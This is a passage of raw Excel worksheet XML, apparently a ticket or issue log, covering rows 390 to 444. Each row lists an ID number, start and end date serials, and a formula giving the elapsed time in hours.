        <v>7</v>
      </c>
      <c r="E390" s="1">
        <v>43607.795185185183</v>
      </c>
      <c r="F390" s="1">
        <v>43721.26761574074</v>
      </c>
      <c r="G390" t="s">
        <v>1579</v>
      </c>
      <c r="H390" t="str">
        <f>TEXT(F390-E390,"[h]")</f>
        <v>2723</v>
      </c>
    </row>
    <row r="391" spans="1:8" hidden="1">
      <c r="A391" t="s">
        <v>1650</v>
      </c>
      <c r="B391">
        <v>13603</v>
      </c>
      <c r="C391" t="s">
        <v>1651</v>
      </c>
      <c r="D391" t="s">
        <v>7</v>
      </c>
      <c r="E391" s="1">
        <v>43606.873437499999</v>
      </c>
      <c r="F391" s="1">
        <v>43607.644803240742</v>
      </c>
      <c r="G391" t="s">
        <v>55</v>
      </c>
      <c r="H391" t="str">
        <f>TEXT(F391-E391,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="392" spans="1:8" hidden="1">
      <c r="A392" t="s">
        <v>1652</v>
      </c>
      <c r="B392">
        <v>13600</v>
      </c>
      <c r="C392" t="s">
        <v>1653</v>
      </c>
      <c r="D392" t="s">
        <v>7</v>
      </c>
      <c r="E392" s="1">
        <v>43606.662349537037</v>
      </c>
      <c r="F392" s="1">
        <v>43610.763622685183</v>
      </c>
      <c r="G392" t="s">
        <v>998</v>
      </c>
      <c r="H392" t="str">
        <f>TEXT(F392-E392,"[h]")</f>
        <v>98</v>
      </c>
    </row>
    <row r="393" spans="1:8" hidden="1">
      <c r="A393" t="s">
        <v>1654</v>
      </c>
      <c r="B393">
        <v>13598</v>
      </c>
      <c r="C393" t="s">
        <v>1655</v>
      </c>
      <c r="D393" t="s">
        <v>7</v>
      </c>
      <c r="E393" s="1">
        <v>43606.562523148146</v>
      </c>
      <c r="F393" s="1">
        <v>43606.647638888891</v>
      </c>
      <c r="G393" t="s">
        <v>115</v>
      </c>
      <c r="H393" t="str">
        <f>TEXT(F393-E393,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="394" spans="1:8" hidden="1">
      <c r="A394" t="s">
        <v>1656</v>
      </c>
      <c r="B394">
        <v>13595</v>
      </c>
      <c r="C394" t="s">
        <v>1657</v>
      </c>
      <c r="D394" t="s">
        <v>7</v>
      </c>
      <c r="E394" s="1">
        <v>43605.707673611112</v>
      </c>
      <c r="F394" s="1">
        <v>43606.836886574078</v>
      </c>
      <c r="G394" t="s">
        <v>1658</v>
      </c>
      <c r="H394" t="str">
        <f>TEXT(F394-E394,"[h]")</f>
        <v>27</v>
      </c>
    </row>
    <row r="395" spans="1:8" hidden="1">
      <c r="A395" t="s">
        <v>1659</v>
      </c>
      <c r="B395">
        <v>13592</v>
      </c>
      <c r="C395" t="s">
        <v>1660</v>
      </c>
      <c r="D395" t="s">
        <v>7</v>
      </c>
      <c r="E395" s="1">
        <v>43605.535405092596</v>
      </c>
      <c r="F395" s="1">
        <v>43605.669652777775</v>
      </c>
      <c r="G395" t="s">
        <v>222</v>
      </c>
      <c r="H395" t="str">
        <f>TEXT(F395-E395,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="396" spans="1:8">
      <c r="A396" t="s">
        <v>1661</v>
      </c>
      <c r="B396">
        <v>13590</v>
      </c>
      <c r="C396" t="s">
        <v>1561</v>
      </c>
      <c r="D396" t="s">
        <v>7</v>
      </c>
      <c r="E396" s="1">
        <v>43605.411319444444</v>
      </c>
      <c r="F396" s="1">
        <v>43613.293032407404</v>
      </c>
      <c r="G396" t="s">
        <v>16</v>
      </c>
      <c r="H396" t="str">
        <f>TEXT(F396-E396,"[h]")</f>
        <v>189</v>
      </c>
    </row>
    <row r="397" spans="1:8" hidden="1">
      <c r="A397" t="s">
        <v>1662</v>
      </c>
      <c r="B397">
        <v>13589</v>
      </c>
      <c r="C397" t="s">
        <v>1663</v>
      </c>
      <c r="D397" t="s">
        <v>7</v>
      </c>
      <c r="E397" s="1">
        <v>43604.888101851851</v>
      </c>
      <c r="F397" s="1">
        <v>43605.69258101852</v>
      </c>
      <c r="G397" t="s">
        <v>174</v>
      </c>
      <c r="H397" t="str">
        <f>TEXT(F397-E397,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="398" spans="1:8">
      <c r="A398" t="s">
        <v>1664</v>
      </c>
      <c r="B398">
        <v>13587</v>
      </c>
      <c r="C398" t="s">
        <v>1665</v>
      </c>
      <c r="D398" t="s">
        <v>7</v>
      </c>
      <c r="E398" s="1">
        <v>43604.780150462961</v>
      </c>
      <c r="F398" s="1">
        <v>43605.077476851853</v>
      </c>
      <c r="G398" t="s">
        <v>1666</v>
      </c>
      <c r="H398" t="str">
        <f>TEXT(F398-E398,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="399" spans="1:8">
      <c r="A399" t="s">
        <v>1667</v>
      </c>
      <c r="B399">
        <v>13586</v>
      </c>
      <c r="C399" t="s">
        <v>1668</v>
      </c>
      <c r="D399" t="s">
        <v>7</v>
      </c>
      <c r="E399" s="1">
        <v>43604.276932870373</v>
      </c>
      <c r="F399" s="1">
        <v>43614.042557870373</v>
      </c>
      <c r="G399" t="s">
        <v>1669</v>
      </c>
      <c r="H399" t="str">
        <f>TEXT(F399-E399,"[h]")</f>
        <v>234</v>
      </c>
    </row>
    <row r="400" spans="1:8" hidden="1">
      <c r="A400" t="s">
        <v>1670</v>
      </c>
      <c r="B400">
        <v>13585</v>
      </c>
      <c r="C400" t="s">
        <v>1671</v>
      </c>
      <c r="D400" t="s">
        <v>7</v>
      </c>
      <c r="E400" s="1">
        <v>43603.978020833332</v>
      </c>
      <c r="F400" s="1">
        <v>43610.798541666663</v>
      </c>
      <c r="G400" t="s">
        <v>461</v>
      </c>
      <c r="H400" t="str">
        <f>TEXT(F400-E400,"[h]")</f>
        <v>163</v>
      </c>
    </row>
    <row r="401" spans="1:8" hidden="1">
      <c r="A401" t="s">
        <v>1672</v>
      </c>
      <c r="B401">
        <v>13584</v>
      </c>
      <c r="C401" t="s">
        <v>1673</v>
      </c>
      <c r="D401" t="s">
        <v>7</v>
      </c>
      <c r="E401" s="1">
        <v>43603.922673611109</v>
      </c>
      <c r="F401" s="1">
        <v>43609.48170138889</v>
      </c>
      <c r="G401" t="s">
        <v>66</v>
      </c>
      <c r="H401" t="str">
        <f>TEXT(F401-E401,"[h]")</f>
        <v>133</v>
      </c>
    </row>
    <row r="402" spans="1:8" hidden="1">
      <c r="A402" t="s">
        <v>1674</v>
      </c>
      <c r="B402">
        <v>13581</v>
      </c>
      <c r="C402" t="s">
        <v>1675</v>
      </c>
      <c r="D402" t="s">
        <v>7</v>
      </c>
      <c r="E402" s="1">
        <v>43603.044270833336</v>
      </c>
      <c r="F402" s="1">
        <v>43604.698518518519</v>
      </c>
      <c r="G402" t="s">
        <v>37</v>
      </c>
      <c r="H402" t="str">
        <f>TEXT(F402-E402,"[h]")</f>
        <v>39</v>
      </c>
    </row>
    <row r="403" spans="1:8" hidden="1">
      <c r="A403" t="s">
        <v>1676</v>
      </c>
      <c r="B403">
        <v>13576</v>
      </c>
      <c r="C403" t="s">
        <v>1677</v>
      </c>
      <c r="D403" t="s">
        <v>7</v>
      </c>
      <c r="E403" s="1">
        <v>43601.38726851852</v>
      </c>
      <c r="F403" s="1">
        <v>43601.833553240744</v>
      </c>
      <c r="G403" t="s">
        <v>1678</v>
      </c>
      <c r="H403" t="str">
        <f>TEXT(F403-E403,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="404" spans="1:8" hidden="1">
      <c r="A404" t="s">
        <v>1679</v>
      </c>
      <c r="B404">
        <v>13575</v>
      </c>
      <c r="C404" t="s">
        <v>1680</v>
      </c>
      <c r="D404" t="s">
        <v>7</v>
      </c>
      <c r="E404" s="1">
        <v>43601.36346064815</v>
      </c>
      <c r="F404" s="1">
        <v>43613.17769675926</v>
      </c>
      <c r="G404" t="s">
        <v>1681</v>
      </c>
      <c r="H404" t="str">
        <f>TEXT(F404-E404,"[h]")</f>
        <v>283</v>
      </c>
    </row>
    <row r="405" spans="1:8" hidden="1">
      <c r="A405" t="s">
        <v>1682</v>
      </c>
      <c r="B405">
        <v>13574</v>
      </c>
      <c r="C405" t="s">
        <v>1683</v>
      </c>
      <c r="D405" t="s">
        <v>7</v>
      </c>
      <c r="E405" s="1">
        <v>43601.110486111109</v>
      </c>
      <c r="F405" s="1">
        <v>43607.552754629629</v>
      </c>
      <c r="G405" t="s">
        <v>255</v>
      </c>
      <c r="H405" t="str">
        <f>TEXT(F405-E405,"[h]")</f>
        <v>154</v>
      </c>
    </row>
    <row r="406" spans="1:8" hidden="1">
      <c r="A406" t="s">
        <v>1684</v>
      </c>
      <c r="B406">
        <v>13573</v>
      </c>
      <c r="C406" t="s">
        <v>1685</v>
      </c>
      <c r="D406" t="s">
        <v>7</v>
      </c>
      <c r="E406" s="1">
        <v>43601.072210648148</v>
      </c>
      <c r="F406" s="1">
        <v>43603.783425925925</v>
      </c>
      <c r="G406" t="s">
        <v>118</v>
      </c>
      <c r="H406" t="str">
        <f>TEXT(F406-E406,"[h]")</f>
        <v>65</v>
      </c>
    </row>
    <row r="407" spans="1:8" hidden="1">
      <c r="A407" t="s">
        <v>1686</v>
      </c>
      <c r="B407">
        <v>13571</v>
      </c>
      <c r="C407" t="s">
        <v>1687</v>
      </c>
      <c r="D407" t="s">
        <v>7</v>
      </c>
      <c r="E407" s="1">
        <v>43600.804375</v>
      </c>
      <c r="F407" s="1">
        <v>43602.084004629629</v>
      </c>
      <c r="G407" t="s">
        <v>75</v>
      </c>
      <c r="H407" t="str">
        <f>TEXT(F407-E407,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="408" spans="1:8" hidden="1">
      <c r="A408" t="s">
        <v>1688</v>
      </c>
      <c r="B408">
        <v>13570</v>
      </c>
      <c r="C408" t="s">
        <v>1689</v>
      </c>
      <c r="D408" t="s">
        <v>7</v>
      </c>
      <c r="E408" s="1">
        <v>43600.771851851852</v>
      </c>
      <c r="F408" s="1">
        <v>43604.288182870368</v>
      </c>
      <c r="G408" t="s">
        <v>51</v>
      </c>
      <c r="H408" t="str">
        <f>TEXT(F408-E408,"[h]")</f>
        <v>84</v>
      </c>
    </row>
    <row r="409" spans="1:8">
      <c r="A409" t="s">
        <v>1690</v>
      </c>
      <c r="B409">
        <v>13565</v>
      </c>
      <c r="C409" t="s">
        <v>463</v>
      </c>
      <c r="D409" t="s">
        <v>7</v>
      </c>
      <c r="E409" s="1">
        <v>43599.978946759256</v>
      </c>
      <c r="F409" s="1">
        <v>43600.073888888888</v>
      </c>
      <c r="G409" t="s">
        <v>98</v>
      </c>
      <c r="H409" t="str">
        <f>TEXT(F409-E409,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="410" spans="1:8">
      <c r="A410" t="s">
        <v>1691</v>
      </c>
      <c r="B410">
        <v>13564</v>
      </c>
      <c r="C410" t="s">
        <v>1692</v>
      </c>
      <c r="D410" t="s">
        <v>7</v>
      </c>
      <c r="E410" s="1">
        <v>43599.974479166667</v>
      </c>
      <c r="F410" s="1">
        <v>43600.073611111111</v>
      </c>
      <c r="G410" t="s">
        <v>1693</v>
      </c>
      <c r="H410" t="str">
        <f>TEXT(F410-E410,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="411" spans="1:8" hidden="1">
      <c r="A411" t="s">
        <v>1704</v>
      </c>
      <c r="B411">
        <v>13558</v>
      </c>
      <c r="C411" t="s">
        <v>1705</v>
      </c>
      <c r="D411" t="s">
        <v>7</v>
      </c>
      <c r="E411" s="1">
        <v>43599.813206018516</v>
      </c>
      <c r="F411" s="1">
        <v>43607.69972222222</v>
      </c>
      <c r="G411" t="s">
        <v>1706</v>
      </c>
      <c r="H411" t="str">
        <f>TEXT(F411-E411,"[h]")</f>
        <v>189</v>
      </c>
    </row>
    <row r="412" spans="1:8" hidden="1">
      <c r="A412" t="s">
        <v>1710</v>
      </c>
      <c r="B412">
        <v>13551</v>
      </c>
      <c r="C412" t="s">
        <v>1711</v>
      </c>
      <c r="D412" t="s">
        <v>7</v>
      </c>
      <c r="E412" s="1">
        <v>43598.820462962962</v>
      </c>
      <c r="F412" s="1">
        <v>43614.217777777776</v>
      </c>
      <c r="G412" t="s">
        <v>255</v>
      </c>
      <c r="H412" t="str">
        <f>TEXT(F412-E412,"[h]")</f>
        <v>369</v>
      </c>
    </row>
    <row r="413" spans="1:8">
      <c r="A413" t="s">
        <v>1707</v>
      </c>
      <c r="B413">
        <v>13550</v>
      </c>
      <c r="C413" t="s">
        <v>1708</v>
      </c>
      <c r="D413" t="s">
        <v>7</v>
      </c>
      <c r="E413" s="1">
        <v>43598.80846064815</v>
      </c>
      <c r="F413" s="1">
        <v>43598.944166666668</v>
      </c>
      <c r="G413" t="s">
        <v>1709</v>
      </c>
      <c r="H413" t="str">
        <f>TEXT(F413-E413,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="414" spans="1:8" hidden="1">
      <c r="A414" t="s">
        <v>1714</v>
      </c>
      <c r="B414">
        <v>13546</v>
      </c>
      <c r="C414" t="s">
        <v>1715</v>
      </c>
      <c r="D414" t="s">
        <v>7</v>
      </c>
      <c r="E414" s="1">
        <v>43598.131620370368</v>
      </c>
      <c r="F414" s="1">
        <v>43598.502187500002</v>
      </c>
      <c r="G414" t="s">
        <v>1716</v>
      </c>
      <c r="H414" t="str">
        <f>TEXT(F414-E414,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="415" spans="1:8" hidden="1">
      <c r="A415" t="s">
        <v>1717</v>
      </c>
      <c r="B415">
        <v>13544</v>
      </c>
      <c r="C415" t="s">
        <v>1718</v>
      </c>
      <c r="D415" t="s">
        <v>7</v>
      </c>
      <c r="E415" s="1">
        <v>43598.07236111111</v>
      </c>
      <c r="F415" s="1">
        <v>43601.269097222219</v>
      </c>
      <c r="G415" t="s">
        <v>37</v>
      </c>
      <c r="H415" t="str">
        <f>TEXT(F415-E415,"[h]")</f>
        <v>76</v>
      </c>
    </row>
    <row r="416" spans="1:8" hidden="1">
      <c r="A416" t="s">
        <v>1719</v>
      </c>
      <c r="B416">
        <v>13542</v>
      </c>
      <c r="C416" t="s">
        <v>1720</v>
      </c>
      <c r="D416" t="s">
        <v>7</v>
      </c>
      <c r="E416" s="1">
        <v>43597.800046296295</v>
      </c>
      <c r="F416" s="1">
        <v>43633.649363425924</v>
      </c>
      <c r="G416" t="s">
        <v>1721</v>
      </c>
      <c r="H416" t="str">
        <f>TEXT(F416-E416,"[h]")</f>
        <v>860</v>
      </c>
    </row>
    <row r="417" spans="1:8" hidden="1">
      <c r="A417" t="s">
        <v>1722</v>
      </c>
      <c r="B417">
        <v>13541</v>
      </c>
      <c r="C417" t="s">
        <v>1723</v>
      </c>
      <c r="D417" t="s">
        <v>7</v>
      </c>
      <c r="E417" s="1">
        <v>43597.709733796299</v>
      </c>
      <c r="F417" s="1">
        <v>43606.789085648146</v>
      </c>
      <c r="G417" t="s">
        <v>37</v>
      </c>
      <c r="H417" t="str">
        <f>TEXT(F417-E417,"[h]")</f>
        <v>217</v>
      </c>
    </row>
    <row r="418" spans="1:8" hidden="1">
      <c r="A418" t="s">
        <v>1724</v>
      </c>
      <c r="B418">
        <v>13536</v>
      </c>
      <c r="C418" t="s">
        <v>1725</v>
      </c>
      <c r="D418" t="s">
        <v>7</v>
      </c>
      <c r="E418" s="1">
        <v>43596.980671296296</v>
      </c>
      <c r="F418" s="1">
        <v>43611.586493055554</v>
      </c>
      <c r="G418" t="s">
        <v>66</v>
      </c>
      <c r="H418" t="str">
        <f>TEXT(F418-E418,"[h]")</f>
        <v>350</v>
      </c>
    </row>
    <row r="419" spans="1:8" hidden="1">
      <c r="A419" t="s">
        <v>1726</v>
      </c>
      <c r="B419">
        <v>13535</v>
      </c>
      <c r="C419" t="s">
        <v>1727</v>
      </c>
      <c r="D419" t="s">
        <v>7</v>
      </c>
      <c r="E419" s="1">
        <v>43596.945729166669</v>
      </c>
      <c r="F419" s="1">
        <v>43598.961481481485</v>
      </c>
      <c r="G419" t="s">
        <v>55</v>
      </c>
      <c r="H419" t="str">
        <f>TEXT(F419-E419,"[h]")</f>
        <v>48</v>
      </c>
    </row>
    <row r="420" spans="1:8">
      <c r="A420" t="s">
        <v>1712</v>
      </c>
      <c r="B420">
        <v>13534</v>
      </c>
      <c r="C420" t="s">
        <v>1713</v>
      </c>
      <c r="D420" t="s">
        <v>7</v>
      </c>
      <c r="E420" s="1">
        <v>43596.943865740737</v>
      </c>
      <c r="F420" s="1">
        <v>43597.031319444446</v>
      </c>
      <c r="G420" t="s">
        <v>1709</v>
      </c>
      <c r="H420" t="str">
        <f>TEXT(F420-E420,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="421" spans="1:8" hidden="1">
      <c r="A421" t="s">
        <v>1108</v>
      </c>
      <c r="B421">
        <v>13530</v>
      </c>
      <c r="C421" t="s">
        <v>1728</v>
      </c>
      <c r="D421" t="s">
        <v>7</v>
      </c>
      <c r="E421" s="1">
        <v>43596.823310185187</v>
      </c>
      <c r="F421" s="1">
        <v>43598.874675925923</v>
      </c>
      <c r="G421" t="s">
        <v>1729</v>
      </c>
      <c r="H421" t="str">
        <f>TEXT(F421-E421,"[h]")</f>
        <v>49</v>
      </c>
    </row>
    <row r="422" spans="1:8" hidden="1">
      <c r="A422" t="s">
        <v>1730</v>
      </c>
      <c r="B422">
        <v>13529</v>
      </c>
      <c r="C422" t="s">
        <v>1731</v>
      </c>
      <c r="D422" t="s">
        <v>7</v>
      </c>
      <c r="E422" s="1">
        <v>43596.810196759259</v>
      </c>
      <c r="F422" s="1">
        <v>43598.61078703704</v>
      </c>
      <c r="G422" t="s">
        <v>28</v>
      </c>
      <c r="H422" t="str">
        <f>TEXT(F422-E422,"[h]")</f>
        <v>43</v>
      </c>
    </row>
    <row r="423" spans="1:8" hidden="1">
      <c r="A423" t="s">
        <v>1732</v>
      </c>
      <c r="B423">
        <v>13526</v>
      </c>
      <c r="C423" t="s">
        <v>1733</v>
      </c>
      <c r="D423" t="s">
        <v>7</v>
      </c>
      <c r="E423" s="1">
        <v>43596.705381944441</v>
      </c>
      <c r="F423" s="1">
        <v>43660.151979166665</v>
      </c>
      <c r="G423" t="s">
        <v>174</v>
      </c>
      <c r="H423" t="str">
        <f>TEXT(F423-E423,"[h]")</f>
        <v>1522</v>
      </c>
    </row>
    <row r="424" spans="1:8">
      <c r="A424" t="s">
        <v>1734</v>
      </c>
      <c r="B424">
        <v>13524</v>
      </c>
      <c r="C424" t="s">
        <v>1735</v>
      </c>
      <c r="D424" t="s">
        <v>7</v>
      </c>
      <c r="E424" s="1">
        <v>43596.023564814815</v>
      </c>
      <c r="F424" s="1">
        <v>43596.784918981481</v>
      </c>
      <c r="G424" t="s">
        <v>25</v>
      </c>
      <c r="H424" t="str">
        <f>TEXT(F424-E424,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="425" spans="1:8">
      <c r="A425" t="s">
        <v>1736</v>
      </c>
      <c r="B425">
        <v>13523</v>
      </c>
      <c r="C425" t="s">
        <v>1737</v>
      </c>
      <c r="D425" t="s">
        <v>7</v>
      </c>
      <c r="E425" s="1">
        <v>43595.918564814812</v>
      </c>
      <c r="F425" s="1">
        <v>43604.772210648145</v>
      </c>
      <c r="G425" t="s">
        <v>126</v>
      </c>
      <c r="H425" t="str">
        <f>TEXT(F425-E425,"[h]")</f>
        <v>212</v>
      </c>
    </row>
    <row r="426" spans="1:8">
      <c r="A426" t="s">
        <v>773</v>
      </c>
      <c r="B426">
        <v>13520</v>
      </c>
      <c r="C426" t="s">
        <v>1738</v>
      </c>
      <c r="D426" t="s">
        <v>7</v>
      </c>
      <c r="E426" s="1">
        <v>43595.177673611113</v>
      </c>
      <c r="F426" s="1">
        <v>43601.287511574075</v>
      </c>
      <c r="G426" t="s">
        <v>16</v>
      </c>
      <c r="H426" t="str">
        <f>TEXT(F426-E426,"[h]")</f>
        <v>146</v>
      </c>
    </row>
    <row r="427" spans="1:8" hidden="1">
      <c r="A427" t="s">
        <v>1739</v>
      </c>
      <c r="B427">
        <v>13518</v>
      </c>
      <c r="C427" t="s">
        <v>1740</v>
      </c>
      <c r="D427" t="s">
        <v>7</v>
      </c>
      <c r="E427" s="1">
        <v>43594.874571759261</v>
      </c>
      <c r="F427" s="1">
        <v>43598.089884259258</v>
      </c>
      <c r="G427" t="s">
        <v>333</v>
      </c>
      <c r="H427" t="str">
        <f>TEXT(F427-E427,"[h]")</f>
        <v>77</v>
      </c>
    </row>
    <row r="428" spans="1:8">
      <c r="A428" t="s">
        <v>1741</v>
      </c>
      <c r="B428">
        <v>13517</v>
      </c>
      <c r="C428" t="s">
        <v>1742</v>
      </c>
      <c r="D428" t="s">
        <v>7</v>
      </c>
      <c r="E428" s="1">
        <v>43594.763206018521</v>
      </c>
      <c r="F428" s="1">
        <v>43595.205729166664</v>
      </c>
      <c r="G428" t="s">
        <v>1669</v>
      </c>
      <c r="H428" t="str">
        <f>TEXT(F428-E428,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="429" spans="1:8">
      <c r="A429" t="s">
        <v>1743</v>
      </c>
      <c r="B429">
        <v>13512</v>
      </c>
      <c r="C429" t="s">
        <v>1744</v>
      </c>
      <c r="D429" t="s">
        <v>7</v>
      </c>
      <c r="E429" s="1">
        <v>43594.259641203702</v>
      </c>
      <c r="F429" s="1">
        <v>43602.141921296294</v>
      </c>
      <c r="G429" t="s">
        <v>123</v>
      </c>
      <c r="H429" t="str">
        <f>TEXT(F429-E429,"[h]")</f>
        <v>189</v>
      </c>
    </row>
    <row r="430" spans="1:8" hidden="1">
      <c r="A430" t="s">
        <v>1745</v>
      </c>
      <c r="B430">
        <v>13509</v>
      </c>
      <c r="C430" t="s">
        <v>1746</v>
      </c>
      <c r="D430" t="s">
        <v>7</v>
      </c>
      <c r="E430" s="1">
        <v>43593.757951388892</v>
      </c>
      <c r="F430" s="1">
        <v>43608.048125000001</v>
      </c>
      <c r="G430" t="s">
        <v>278</v>
      </c>
      <c r="H430" t="str">
        <f>TEXT(F430-E430,"[h]")</f>
        <v>342</v>
      </c>
    </row>
    <row r="431" spans="1:8">
      <c r="A431" t="s">
        <v>1702</v>
      </c>
      <c r="B431">
        <v>13508</v>
      </c>
      <c r="C431" t="s">
        <v>1703</v>
      </c>
      <c r="D431" t="s">
        <v>7</v>
      </c>
      <c r="E431" s="1">
        <v>43593.706689814811</v>
      </c>
      <c r="F431" s="1">
        <v>43596.692523148151</v>
      </c>
      <c r="G431" t="s">
        <v>16</v>
      </c>
      <c r="H431" t="str">
        <f>TEXT(F431-E431,"[h]")</f>
        <v>71</v>
      </c>
    </row>
    <row r="432" spans="1:8">
      <c r="A432" t="s">
        <v>1747</v>
      </c>
      <c r="B432">
        <v>13507</v>
      </c>
      <c r="C432" t="s">
        <v>1563</v>
      </c>
      <c r="D432" t="s">
        <v>7</v>
      </c>
      <c r="E432" s="1">
        <v>43593.521782407406</v>
      </c>
      <c r="F432" s="1">
        <v>43613.385752314818</v>
      </c>
      <c r="G432" t="s">
        <v>16</v>
      </c>
      <c r="H432" t="str">
        <f>TEXT(F432-E432,"[h]")</f>
        <v>476</v>
      </c>
    </row>
    <row r="433" spans="1:8" hidden="1">
      <c r="A433" t="s">
        <v>1748</v>
      </c>
      <c r="B433">
        <v>13506</v>
      </c>
      <c r="C433" t="s">
        <v>1749</v>
      </c>
      <c r="D433" t="s">
        <v>7</v>
      </c>
      <c r="E433" s="1">
        <v>43593.494050925925</v>
      </c>
      <c r="F433" s="1">
        <v>43606.710138888891</v>
      </c>
      <c r="G433" t="s">
        <v>37</v>
      </c>
      <c r="H433" t="str">
        <f>TEXT(F433-E433,"[h]")</f>
        <v>317</v>
      </c>
    </row>
    <row r="434" spans="1:8" hidden="1">
      <c r="A434" t="s">
        <v>1750</v>
      </c>
      <c r="B434">
        <v>13504</v>
      </c>
      <c r="C434" t="s">
        <v>1751</v>
      </c>
      <c r="D434" t="s">
        <v>7</v>
      </c>
      <c r="E434" s="1">
        <v>43593.412476851852</v>
      </c>
      <c r="F434" s="1">
        <v>43593.429837962962</v>
      </c>
      <c r="G434" t="s">
        <v>66</v>
      </c>
      <c r="H434" t="str">
        <f>TEXT(F434-E434,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="435" spans="1:8" hidden="1">
      <c r="A435" t="s">
        <v>1752</v>
      </c>
      <c r="B435">
        <v>13503</v>
      </c>
      <c r="C435" t="s">
        <v>1753</v>
      </c>
      <c r="D435" t="s">
        <v>7</v>
      </c>
      <c r="E435" s="1">
        <v>43593.290694444448</v>
      </c>
      <c r="F435" s="1">
        <v>43601.235092592593</v>
      </c>
      <c r="G435" t="s">
        <v>1754</v>
      </c>
      <c r="H435" t="str">
        <f>TEXT(F435-E435,"[h]")</f>
        <v>190</v>
      </c>
    </row>
    <row r="436" spans="1:8" hidden="1">
      <c r="A436" t="s">
        <v>1755</v>
      </c>
      <c r="B436">
        <v>13500</v>
      </c>
      <c r="C436" t="s">
        <v>1756</v>
      </c>
      <c r="D436" t="s">
        <v>7</v>
      </c>
      <c r="E436" s="1">
        <v>43592.920254629629</v>
      </c>
      <c r="F436" s="1">
        <v>43615.372569444444</v>
      </c>
      <c r="G436" t="s">
        <v>1757</v>
      </c>
      <c r="H436" t="str">
        <f>TEXT(F436-E436,"[h]")</f>
        <v>538</v>
      </c>
    </row>
    <row r="437" spans="1:8" hidden="1">
      <c r="A437" t="s">
        <v>1758</v>
      </c>
      <c r="B437">
        <v>13499</v>
      </c>
      <c r="C437" t="s">
        <v>1759</v>
      </c>
      <c r="D437" t="s">
        <v>7</v>
      </c>
      <c r="E437" s="1">
        <v>43592.766377314816</v>
      </c>
      <c r="F437" s="1">
        <v>43597.671909722223</v>
      </c>
      <c r="G437" t="s">
        <v>174</v>
      </c>
      <c r="H437" t="str">
        <f>TEXT(F437-E437,"[h]")</f>
        <v>117</v>
      </c>
    </row>
    <row r="438" spans="1:8" hidden="1">
      <c r="A438" t="s">
        <v>1760</v>
      </c>
      <c r="B438">
        <v>13498</v>
      </c>
      <c r="C438" t="s">
        <v>1761</v>
      </c>
      <c r="D438" t="s">
        <v>7</v>
      </c>
      <c r="E438" s="1">
        <v>43592.757824074077</v>
      </c>
      <c r="F438" s="1">
        <v>43593.733680555553</v>
      </c>
      <c r="G438" t="s">
        <v>1762</v>
      </c>
      <c r="H438" t="str">
        <f>TEXT(F438-E438,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="439" spans="1:8">
      <c r="A439" t="s">
        <v>1763</v>
      </c>
      <c r="B439">
        <v>13496</v>
      </c>
      <c r="C439" t="s">
        <v>1764</v>
      </c>
      <c r="D439" t="s">
        <v>7</v>
      </c>
      <c r="E439" s="1">
        <v>43592.722534722219</v>
      </c>
      <c r="F439" s="1">
        <v>43592.895185185182</v>
      </c>
      <c r="G439" t="s">
        <v>610</v>
      </c>
      <c r="H439" t="str">
        <f>TEXT(F439-E439,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="440" spans="1:8">
      <c r="A440" t="s">
        <v>1765</v>
      </c>
      <c r="B440">
        <v>13495</v>
      </c>
      <c r="C440" t="s">
        <v>1766</v>
      </c>
      <c r="D440" t="s">
        <v>7</v>
      </c>
      <c r="E440" s="1">
        <v>43592.65556712963</v>
      </c>
      <c r="F440" s="1">
        <v>43593.73133101852</v>
      </c>
      <c r="G440" t="s">
        <v>1669</v>
      </c>
      <c r="H440" t="str">
        <f>TEXT(F440-E440,"[h]")</f>
        <v>25</v>
      </c>
    </row>
    <row r="441" spans="1:8">
      <c r="A441" t="s">
        <v>1767</v>
      </c>
      <c r="B441">
        <v>13493</v>
      </c>
      <c r="C441" t="s">
        <v>1768</v>
      </c>
      <c r="D441" t="s">
        <v>7</v>
      </c>
      <c r="E441" s="1">
        <v>43592.39466435185</v>
      </c>
      <c r="F441" s="1">
        <v>43593.73133101852</v>
      </c>
      <c r="G441" t="s">
        <v>123</v>
      </c>
      <c r="H441" t="str">
        <f>TEXT(F441-E441,"[h]")</f>
        <v>32</v>
      </c>
    </row>
    <row r="442" spans="1:8">
      <c r="A442" t="s">
        <v>1769</v>
      </c>
      <c r="B442">
        <v>13491</v>
      </c>
      <c r="C442" t="s">
        <v>1770</v>
      </c>
      <c r="D442" t="s">
        <v>7</v>
      </c>
      <c r="E442" s="1">
        <v>43592.344537037039</v>
      </c>
      <c r="F442" s="1">
        <v>43604.362083333333</v>
      </c>
      <c r="G442" t="s">
        <v>1771</v>
      </c>
      <c r="H442" t="str">
        <f>TEXT(F442-E442,"[h]")</f>
        <v>288</v>
      </c>
    </row>
    <row r="443" spans="1:8" hidden="1">
      <c r="A443" t="s">
        <v>1773</v>
      </c>
      <c r="B443">
        <v>13485</v>
      </c>
      <c r="C443" t="s">
        <v>1774</v>
      </c>
      <c r="D443" t="s">
        <v>7</v>
      </c>
      <c r="E443" s="1">
        <v>43591.859317129631</v>
      </c>
      <c r="F443" s="1">
        <v>43593.431956018518</v>
      </c>
      <c r="G443" t="s">
        <v>66</v>
      </c>
      <c r="H443" t="str">
        <f>TEXT(F443-E443,"[h]")</f>
        <v>37</v>
      </c>
    </row>
    <row r="444" spans="1:8" hidden="1">
      <c r="A444" t="s">
        <v>1775</v>
      </c>
      <c r="B444">
        <v>13482</v>
      </c>
      <c r="C444" t="s">
        <v>1776</v>
      </c>
      <c r="D444" t="s">
        <v>7</v>
      </c>
      <c r="E444" s="1">
        <v>43591.445439814815</v>
      </c>
      <c r="F444" s="1">
        <v>43596.728564814817</v>
      </c>
      <c r="G444" t="s">
        <v>55</v>
      </c>
      <c r="H444" t="str">
